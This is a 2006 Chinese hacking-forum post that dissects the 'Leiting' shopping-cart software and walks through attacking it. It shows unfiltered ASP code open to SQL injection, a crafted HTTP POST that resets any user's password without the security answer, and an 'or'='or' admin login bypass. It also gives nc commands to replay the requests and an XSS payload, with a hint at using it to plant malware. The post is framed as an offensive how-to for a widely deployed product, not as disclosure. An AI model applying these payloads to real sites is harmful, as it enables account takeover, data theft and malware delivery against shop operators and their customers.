|
論壇說明 |
歡迎您來到『史萊姆論壇』 ^___^ 您目前正以訪客的身份瀏覽本論壇,訪客所擁有的權限將受到限制,您可以瀏覽本論壇大部份的版區與文章,但您將無法參與任何討論或是使用私人訊息與其他會員交流。若您希望擁有完整的使用權限,請註冊成為我們的一份子,註冊的程序十分簡單、快速,而且最重要的是--註冊是完全免費的! 請點擊這裡:『註冊成為我們的一份子!』 |
|
主題工具 | 顯示模式 |
2006-05-25, 03:39 PM | #1 |
榮譽會員
|
軟體 - 霸王背後的脆弱——完全解剖雷霆購物系統
霸王背後的脆弱——完全解剖雷霆購物系統
x-key[S.H.C] 軍訓回來很是無聊,看到本機的英特爾分公司用的是一個叫雷霆購物系統的整站程序,雷霆購物系統是國內一個使用比較廣泛的購物系統,現在,我們就來看看它的安全性究竟如何吧!從網上下載7.08最新版的雷霆購物系統,現在我們來分析程式碼!! 一、SQL注入漏洞 我們先來看看vpro.asp文件的部分漏洞程式碼: <% dim id id=request.QueryString("id") dim prename,company,intro,predate,graph2,description,remarks,price set rs=server.CreateObject("adodb.recordset") rs.open "select * from product where id="&id,conn,1,3 rs("viewnum")=rs("viewnum")+1 rs.update %> sub.asp文件的漏洞程式碼: sortsid=request.querystring("nid") if Not isempty(request("page")) then currentPage=Cint(request("page")) else currentPage=1 end if set rs=server.CreateObject("adodb.recordset") rs.open "select pagenum,name,mark,vipprice,discount,score,id,author,productdate,price2,price1,discount,pic from product where sortsid="&sortsid&" order by adddate desc",conn,1,1 還有rank.asp文件的漏洞程式碼: dim id,action action=request.QueryString("action") id=request.QueryString("id") set rs=server.CreateObject("adodb.recordset") rs.open "select id,name,rank,ranknum from product where id="&id,conn,1,3 參數全都沒有做過濾,用普通的注入工具就能輕鬆注入。如圖1所顯示: Search.asp這個文件我開始還以為是搜尋頁面,但是當我細讀程式碼後,發現原來reseach.asp才是真正的搜尋文件,其中又這樣一段程式碼: if name<>"" then sql=sql&"and name like '%"&name&"%' " end if if author<>"" then sql=sql&"and author like '%"&author&"%' " end if if manufacturer<>"" then sql=sql&"and mark like '%"&manufacturer&"%' " end if if code<>"" then sql=sql&"and categoryid like '%"&code&"%' " 這就是傳統的填字遊戲!!因為它在進階搜尋頁面作了java script過濾,所以我們要用nc提交來進行cookies注入。但我們也可以在快速搜尋頁面提交:「504%』注入語句』%504」就能注入了,抓包然後把位址放在NBSI裡就能注入了,因為我的IIS有點問題,所有就沒深入測試。 二、爆庫 資料庫連接文件conn.asp並沒有加入容錯語句On Error Resume Next我們隨便找一個帶參數的位址,如:http://www.hackerxfiles.net/vpro.asp...2所顯示: 三、cookies欺騙漏洞 Forget.asp是密碼找回文件文件,repws.asp是修改密碼文件,我們來看看它的部分程式碼: <% if request("username")="" then call MsgBox("非法使用!","Back","None") response.end end if dim tmp set rs=server.CreateObject("adodb.recordset") '提交修改密碼 if not isempty(request("SubmitRePws")) then if request("password")<>request("password2") then call MsgBox("再次輸入密碼不一致!","Back","None") rs.open "select password from [user] where username='"&trim(request("username"))&"'",conn,1,3 rs("password")=md5(trim(request("password2"))) rs.update rs.close call MsgBox("您的密碼取回成功,請登入!","GoUrl","login.asp") response.end end if rs.open "select answer from [user] where username='"&trim(request("username"))&"' ",conn,1,1 tmp=trim(rs("answer")) rs.close if tmp<>md5(request("answer")) then call Msgbox("對不起,您輸入的問題答案不正確","Back","None") response.end end if set rs=nothing %> 哈哈,笑了吧!我們現在來構造資料包: POST /lt/repws.asp HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: http://localhost/lt/repws.asp Accept-Language: zh-cn Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon) Host: localhost Content-Length: 72 Connection: Keep-Alive 快取-Control: no-cache Cookie: ASPSESSIONIDQGQGQXOO=IFKFCOFAPEOINKPNGDEJEKOF password=121212&password2=121212&SubmitRePws=%CC%E1%BD%BB&username=x-key 修改就把ueername和password、possword2還有Content-Length修改一下就行了,其他的都不用改。我們現在用nc提交:nc localhost 80<1.txt>1.htm,如圖3所顯示,然後我們執行一下1.htm,就會看到圖4的訊息框了! 四、跨站漏洞 註冊文件reg.asp只是在頁面表面用了java script做了過濾,我們可以把它儲存到本機,然後移除java script驗證就能註冊了哈哈,註冊的所有參數都完全沒有做過濾哦!!在裡面添任何東西都可以,但是這又有什麼用呢?那麼這就是要看你的社會工程學了。 我們來看看留言本的login.asp的漏洞程式碼:sqlchk="select * from admin where admin='" & Username & "' and password='" & password & "'"哈哈,用傳統的』or』=』or』就能進入了,但是,頁面做了java script驗證,但是這個驗證就能阻止我們嗎?哈哈,當然不能,繞過java script驗證的方法前面已經講過了,這裡就不重複了! 我們只要先抓包,然後用nc這樣提交就行了nc localhost 80<1.txt>1.htm好了,現在我們就可以開啟1.htm了!! 我們再來看看write.asp文件,我們開啟該頁面在「電子郵件」或者「個人主頁」中輸入跨站程式碼:"><script>alert("x-key")</script><",就能看到我們想要的效果了!如果我們再勾上「只有斑竹才可以看」,哈哈,掛個馬什麼的不就…… 五、最後的總結 其實雷霆購物系統應該還有很多漏洞的,但是由於時間問題,我就不再說了,留給大家一個課後作業!哈哈!!88!! |
__________________ |
|
送花文章: 3,
|